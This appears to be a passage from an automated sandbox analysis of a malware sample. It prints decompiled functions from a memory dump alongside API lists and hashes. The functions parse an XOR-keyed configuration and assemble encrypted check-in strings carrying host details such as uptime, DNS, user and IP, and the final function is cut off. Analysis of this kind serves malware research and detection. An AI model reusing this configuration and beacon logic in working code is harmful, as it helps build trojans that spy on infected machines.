                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: 8788c14a7070e4c048270eefddb980d4edfca85a6626f17e3467ce0a389416ee
                                                                                                                          • Instruction ID: 936109172305f8bf352fef1001b04880648eb00f7c73bc88e2a08ede252c988d
                                                                                                                          • Opcode Fuzzy Hash: 8788c14a7070e4c048270eefddb980d4edfca85a6626f17e3467ce0a389416ee
                                                                                                                          • Instruction Fuzzy Hash: 67318F71A00108BFEB21DB94DD88EAA7BBCFF84B58F1541B9E600AB150D671EE05DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 04974C40, Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E04974C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x497d2dc; // 0x69b25f44
				if(E04975657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x497d310 = _v8;
				}
				_t33 =  *0x497d2dc; // 0x69b25f44
				if(E04975657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x497d2dc; // 0x69b25f44
				if(E04975657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x497d270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x497d2dc; // 0x69b25f44
						_t45 = E04973BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x497d278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x497d2dc; // 0x69b25f44
						_t46 = E04973BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x497d27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x497d2dc; // 0x69b25f44
						_t47 = E04973BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x497d280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x497d2dc; // 0x69b25f44
						_t48 = E04973BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x497d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x497d2dc; // 0x69b25f44
						_t49 = E04973BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x497d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x497d2dc; // 0x69b25f44
						_t50 = E04973BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x497d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x497d2dc; // 0x69b25f44
								_t51 = E04973BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E049749B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04974B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x497d2dc; // 0x69b25f44
								_t52 = E04973BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E049749B8(0, _t52) != 0) {
								_t121 =  *0x497d364; // 0x6ff95b0
								E04979311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x497d2dc; // 0x69b25f44
								_t53 = E04973BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x497d2e0; // 0x267a5a8
								_t22 = _t54 + 0x497e252; // 0x616d692f
								 *0x497d30c = _t22;
								goto L60;
							} else {
								_t64 = E049749B8(0, _t53);
								 *0x497d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x497d2dc; // 0x69b25f44
										_t56 = E04973BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x497d2e0; // 0x267a5a8
										_t23 = _t57 + 0x497e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E049749B8(0, _t56);
									}
									 *0x497d380 = _t58;
									HeapFree( *0x497d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                          0x04974c40
                                                                                                                          0x04974c43
                                                                                                                          0x04974c63
                                                                                                                          0x04974c71
                                                                                                                          0x04974c71
                                                                                                                          0x04974c76
                                                                                                                          0x04974c90
                                                                                                                          0x04974ef8
                                                                                                                          0x04974eff
                                                                                                                          0x04974f06
                                                                                                                          0x04974f06
                                                                                                                          0x04974c96
                                                                                                                          0x04974cb2
                                                                                                                          0x04974ee6
                                                                                                                          0x04974ef0
                                                                                                                          0x00000000
                                                                                                                          0x04974cb8
                                                                                                                          0x04974cb8
                                                                                                                          0x04974cbd
                                                                                                                          0x04974cd3
                                                                                                                          0x04974cbf
                                                                                                                          0x04974cbf
                                                                                                                          0x04974ccc
                                                                                                                          0x04974ccc
                                                                                                                          0x04974cdd
                                                                                                                          0x04974cdf
                                                                                                                          0x04974ce9
                                                                                                                          0x04974cee
                                                                                                                          0x04974cee
                                                                                                                          0x04974ce9
                                                                                                                          0x04974cf5
                                                                                                                          0x04974d0b
                                                                                                                          0x04974cf7
                                                                                                                          0x04974cf7
                                                                                                                          0x04974d04
                                                                                                                          0x04974d04
                                                                                                                          0x04974d0f
                                                                                                                          0x04974d11
                                                                                                                          0x04974d1b
                                                                                                                          0x04974d20
                                                                                                                          0x04974d20
                                                                                                                          0x04974d1b
                                                                                                                          0x04974d27
                                                                                                                          0x04974d3d
                                                                                                                          0x04974d29
                                                                                                                          0x04974d29
                                                                                                                          0x04974d36
                                                                                                                          0x04974d36
                                                                                                                          0x04974d41
                                                                                                                          0x04974d43
                                                                                                                          0x04974d4d
                                                                                                                          0x04974d52
                                                                                                                          0x04974d52
                                                                                                                          0x04974d4d
                                                                                                                          0x04974d59
                                                                                                                          0x04974d6f
                                                                                                                          0x04974d5b
                                                                                                                          0x04974d5b
                                                                                                                          0x04974d68
                                                                                                                          0x04974d68
                                                                                                                          0x04974d73
                                                                                                                          0x04974d75
                                                                                                                          0x04974d7f
                                                                                                                          0x04974d84
                                                                                                                          0x04974d84
                                                                                                                          0x04974d7f
                                                                                                                          0x04974d8b
                                                                                                                          0x04974da1
                                                                                                                          0x04974d8d
                                                                                                                          0x04974d8d
                                                                                                                          0x04974d9a
                                                                                                                          0x04974d9a
                                                                                                                          0x04974da5
                                                                                                                          0x04974da7
                                                                                                                          0x04974db1
                                                                                                                          0x04974db6
                                                                                                                          0x04974db6
                                                                                                                          0x04974db1
                                                                                                                          0x04974dbd
                                                                                                                          0x04974dd3
                                                                                                                          0x04974dbf
                                                                                                                          0x04974dbf
                                                                                                                          0x04974dcc
                                                                                                                          0x04974dcc
                                                                                                                          0x04974dd7
                                                                                                                          0x04974dea
                                                                                                                          0x04974dea
                                                                                                                          0x00000000
                                                                                                                          0x04974dd9
                                                                                                                          0x04974dd9
                                                                                                                          0x04974de3
                                                                                                                          0x00000000
                                                                                                                          0x04974df4
                                                                                                                          0x04974df4
                                                                                                                          0x04974df6
                                                                                                                          0x04974e0c
                                                                                                                          0x04974df8
                                                                                                                          0x04974df8
                                                                                                                          0x04974e05
                                                                                                                          0x04974e05
                                                                                                                          0x04974e10
                                                                                                                          0x04974e12
                                                                                                                          0x04974e15
                                                                                                                          0x04974e16
                                                                                                                          0x04974e1d
                                                                                                                          0x04974e1f
                                                                                                                          0x04974e20
                                                                                                                          0x04974e20
                                                                                                                          0x04974e1d
                                                                                                                          0x04974e27
                                                                                                                          0x04974e3d
                                                                                                                          0x04974e29
                                                                                                                          0x04974e29
                                                                                                                          0x04974e36
                                                                                                                          0x04974e36
                                                                                                                          0x04974e41
                                                                                                                          0x04974e4f
                                                                                                                          0x04974e59
                                                                                                                          0x04974e59
                                                                                                                          0x04974e60
                                                                                                                          0x04974e76
                                                                                                                          0x04974e62
                                                                                                                          0x04974e62
                                                                                                                          0x04974e6f
                                                                                                                          0x04974e6f
                                                                                                                          0x04974e7a
                                                                                                                          0x04974e8d
                                                                                                                          0x04974e8d
                                                                                                                          0x04974e92
                                                                                                                          0x04974e98
                                                                                                                          0x00000000
                                                                                                                          0x04974e7c
                                                                                                                          0x04974e7f
                                                                                                                          0x04974e84
                                                                                                                          0x04974e8b
                                                                                                                          0x04974e9d
                                                                                                                          0x04974e9f
                                                                                                                          0x04974eb5
                                                                                                                          0x04974ea1
                                                                                                                          0x04974ea1
                                                                                                                          0x04974eae
                                                                                                                          0x04974eae
                                                                                                                          0x04974eb9
                                                                                                                          0x04974ec5
                                                                                                                          0x04974eca
                                                                                                                          0x04974eca
                                                                                                                          0x04974ebb
                                                                                                                          0x04974ebe
                                                                                                                          0x04974ebe
                                                                                                                          0x04974ed8
                                                                                                                          0x04974edd
                                                                                                                          0x04974ee3
                                                                                                                          0x00000000
                                                                                                                          0x04974ee3
                                                                                                                          0x00000000
                                                                                                                          0x04974e8b
                                                                                                                          0x04974e7a
                                                                                                                          0x04974de3
                                                                                                                          0x04974dd7

                                                                                                                          APIs
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974CE5
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974D17
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974D49
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974D7B
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974DAD
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974DDF
                                                                                                                          • HeapFree.KERNEL32(00000000,04975390,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008,?,04975390), ref: 04974EDD
                                                                                                                          • HeapFree.KERNEL32(00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008,?,04975390), ref: 04974EF0
                                                                                                                            • Part of subcall function 049749B8: lstrlen.KERNEL32(69B25F44,00000000,7656D3B0,04975390,04974EC3,00000000,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005), ref: 049749C1
                                                                                                                            • Part of subcall function 049749B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,04975390), ref: 049749E4
                                                                                                                            • Part of subcall function 049749B8: memset.NTDLL ref: 049749F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3442150357-0
                                                                                                                          • Opcode ID: 679369828340cea8f59f78e0a3fd7863b5788407af824d11d1582fcfb16978e7
                                                                                                                          • Instruction ID: 45bfc3088364a1fdc7a4a6734cb8c6296c0171a29d3d146eb35a1444bee25833
                                                                                                                          • Opcode Fuzzy Hash: 679369828340cea8f59f78e0a3fd7863b5788407af824d11d1582fcfb16978e7
                                                                                                                          • Instruction Fuzzy Hash: 51816170A04204BFDB21DBB49E88DAB7BEEEF887107244A75E501D7116FA39FD419B60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 049744A4, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E049744A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x497d018; // 0x14d7c998
				asm("bswap eax");
				_t27 =  *0x497d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x497d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x497d00c; // 0x81762942
				asm("bswap eax");
				_t30 =  *0x497d2e0; // 0x267a5a8
				_t3 = _t30 + 0x497e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x497d02c,  *0x497d004, _t25);
				_t33 = E04975B60();
				_t34 =  *0x497d2e0; // 0x267a5a8
				_t4 = _t34 + 0x497e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E04971BBF(_t91);
				if(_t96 != 0) {
					_t83 =  *0x497d2e0; // 0x267a5a8
					_t6 = _t83 + 0x497e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x497d270, 0, _t96);
				}
				_t97 = E0497137A();
				if(_t97 != 0) {
					_t78 =  *0x497d2e0; // 0x267a5a8
					_t8 = _t78 + 0x497e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x497d270, 0, _t97);
				}
				_t98 =  *0x497d364; // 0x6ff95b0
				_a32 = E04973857(0x497d00a, _t98 + 4);
				_t42 =  *0x497d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x497d2e0; // 0x267a5a8
					_t11 = _t74 + 0x497e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x497d304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x497d2e0; // 0x267a5a8
					_t13 = _t71 + 0x497e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x497d270, 0, 0x800);
					if(_t100 != 0) {
						E0497A811(GetTickCount());
						_t50 =  *0x497d364; // 0x6ff95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x497d364; // 0x6ff95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x497d364; // 0x6ff95b0
						_t103 = E04971974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x497c2ac);
							_push(_t103);
							_t62 = E049738CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04972A4E(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E049747D5();
								}
								HeapFree( *0x497d270, 0, _v44);
							}
							HeapFree( *0x497d270, 0, _t103);
						}
						HeapFree( *0x497d270, 0, _t100);
					}
					HeapFree( *0x497d270, 0, _a24);
				}
				HeapFree( *0x497d270, 0, _t105);
				return _a12;
			}
















































                                                                                                                          0x049744a4
                                                                                                                          0x049744a4
                                                                                                                          0x049744a4
                                                                                                                          0x049744a9
                                                                                                                          0x049744af
                                                                                                                          0x049744b9
                                                                                                                          0x049744bb
                                                                                                                          0x049744bb
                                                                                                                          0x049744c8
                                                                                                                          0x049744d3
                                                                                                                          0x049744d6
                                                                                                                          0x049744e1
                                                                                                                          0x049744e4
                                                                                                                          0x049744e9
                                                                                                                          0x049744ec
                                                                                                                          0x049744f1
                                                                                                                          0x049744f4
                                                                                                                          0x04974500
                                                                                                                          0x0497450d
                                                                                                                          0x0497450f
                                                                                                                          0x04974515
                                                                                                                          0x0497451a
                                                                                                                          0x04974525
                                                                                                                          0x04974527
                                                                                                                          0x0497452a
                                                                                                                          0x04974531
                                                                                                                          0x04974535
                                                                                                                          0x04974537
                                                                                                                          0x0497453c
                                                                                                                          0x04974548
                                                                                                                          0x0497454a
                                                                                                                          0x04974556
                                                                                                                          0x04974558
                                                                                                                          0x04974558
                                                                                                                          0x04974563
                                                                                                                          0x04974567
                                                                                                                          0x04974569
                                                                                                                          0x0497456e
                                                                                                                          0x0497457a
                                                                                                                          0x0497457c
                                                                                                                          0x04974588
                                                                                                                          0x0497458a
                                                                                                                          0x0497458a
                                                                                                                          0x04974590
                                                                                                                          0x049745a3
                                                                                                                          0x049745a7
                                                                                                                          0x049745ae
                                                                                                                          0x049745b1
                                                                                                                          0x049745b6
                                                                                                                          0x049745c1
                                                                                                                          0x049745c3
                                                                                                                          0x049745c6
                                                                                                                          0x049745c6
                                                                                                                          0x049745c8
                                                                                                                          0x049745cf
                                                                                                                          0x049745d2
                                                                                                                          0x049745d7
                                                                                                                          0x049745e1
                                                                                                                          0x049745e3
                                                                                                                          0x049745eb
                                                                                                                          0x04974604
                                                                                                                          0x04974608
                                                                                                                          0x04974614
                                                                                                                          0x04974619
                                                                                                                          0x04974622
                                                                                                                          0x04974633
                                                                                                                          0x04974637
                                                                                                                          0x04974640
                                                                                                                          0x04974646
                                                                                                                          0x04974653
                                                                                                                          0x04974660
                                                                                                                          0x04974666
                                                                                                                          0x04974672
                                                                                                                          0x04974678
                                                                                                                          0x04974679
                                                                                                                          0x0497467e
                                                                                                                          0x04974684
                                                                                                                          0x0497468a
                                                                                                                          0x04974691
                                                                                                                          0x04974698
                                                                                                                          0x0497469e
                                                                                                                          0x049746a5
                                                                                                                          0x049746a9
                                                                                                                          0x049746b4
                                                                                                                          0x049746b9
                                                                                                                          0x049746bf
                                                                                                                          0x049746c8
                                                                                                                          0x049746c8
                                                                                                                          0x049746d9
                                                                                                                          0x049746d9
                                                                                                                          0x049746e8
                                                                                                                          0x049746e8
                                                                                                                          0x049746f7
                                                                                                                          0x049746f7
                                                                                                                          0x04974709
                                                                                                                          0x04974709
                                                                                                                          0x04974718
                                                                                                                          0x04974729

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 049744BB
                                                                                                                          • wsprintfA.USER32 ref: 04974508
                                                                                                                          • wsprintfA.USER32 ref: 04974525
                                                                                                                          • wsprintfA.USER32 ref: 04974548
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04974558
                                                                                                                          • wsprintfA.USER32 ref: 0497457A
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0497458A
                                                                                                                          • wsprintfA.USER32 ref: 049745C1
                                                                                                                          • wsprintfA.USER32 ref: 049745E1
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049745FE
                                                                                                                          • GetTickCount.KERNEL32 ref: 0497460E
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 04974622
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 04974640
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04974653,?,06FF95B0), ref: 0497199F
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(?,?,?,04974653,?,06FF95B0), ref: 049719A7
                                                                                                                            • Part of subcall function 04971974: strcpy.NTDLL ref: 049719BE
                                                                                                                            • Part of subcall function 04971974: lstrcat.KERNEL32(00000000,?), ref: 049719C9
                                                                                                                            • Part of subcall function 04971974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04974653,?,06FF95B0), ref: 049719E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,0497C2AC,?,06FF95B0), ref: 04974672
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(06FF9B10,00000000,00000000,745EC740,0497467E,00000000), ref: 049738DA
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(?), ref: 049738E2
                                                                                                                            • Part of subcall function 049738CA: lstrcpy.KERNEL32(00000000,06FF9B10), ref: 049738F6
                                                                                                                            • Part of subcall function 049738CA: lstrcat.KERNEL32(00000000,?), ref: 04973901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04974691
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04974698
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 049746A5
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 049746A9
                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 049746D9
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049746E8
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,06FF95B0), ref: 049746F7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04974709
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04974718
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3963266935-0
                                                                                                                          • Opcode ID: 7729c36a8a4f66cb58905c561165e5584b2b73640c497083a407a13532ec7a25
                                                                                                                          • Instruction ID: 728e5d6cc378c18541f4f9c6bf8e7ab3b0c3f8e5a8ad69ff512c686a7d611bee
                                                                                                                          • Opcode Fuzzy Hash: 7729c36a8a4f66cb58905c561165e5584b2b73640c497083a407a13532ec7a25
                                                                                                                          • Instruction Fuzzy Hash: B1618E71508200AFEB219B64EC88F5A3FA8FF89754F040634FA05D7251E63DED06DBA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04976109, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04976109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x497d018; // 0x14d7c998
				asm("bswap eax");
				_t61 =  *0x497d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x497d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x497d00c; // 0x81762942
				asm("bswap eax");
				_t64 =  *0x497d2e0; // 0x267a5a8
				_t3 = _t64 + 0x497e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x497d02c,  *0x497d004, _t59);
				_t67 = E04975B60();
				_t68 =  *0x497d2e0; // 0x267a5a8
				_t4 = _t68 + 0x497e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E04971BBF(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x497d2e0; // 0x267a5a8
					_t7 = _t126 + 0x497e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x497d270, 0, _v8);
				}
				_t73 = E0497137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x497d2e0; // 0x267a5a8
					_t11 = _t121 + 0x497e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x497d270, 0, _v8);
				}
				_t146 =  *0x497d364; // 0x6ff95b0
				_t75 = E04973857(0x497d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x497d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x497d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x497d270, _t152, _v20);
						goto L26;
					}
					E0497A811(GetTickCount());
					_t82 =  *0x497d364; // 0x6ff95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x497d364; // 0x6ff95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x497d364; // 0x6ff95b0
					_t148 = E04971974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x497d270, _t152, _v8);
						goto L25;
					}
